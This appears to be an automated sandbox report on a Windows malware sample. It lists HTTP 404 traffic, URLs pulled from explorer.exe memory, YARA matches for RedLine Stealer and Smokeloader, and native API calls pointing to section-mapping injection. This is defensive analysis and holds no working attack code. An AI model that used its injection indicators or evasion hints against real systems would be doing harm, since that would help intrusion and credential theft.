      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:04:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:05:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:06:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:06:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1814735549.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1813184602.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1812705551.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1810967326.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1813742183.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1813742183.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\FyDBXJE74v.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
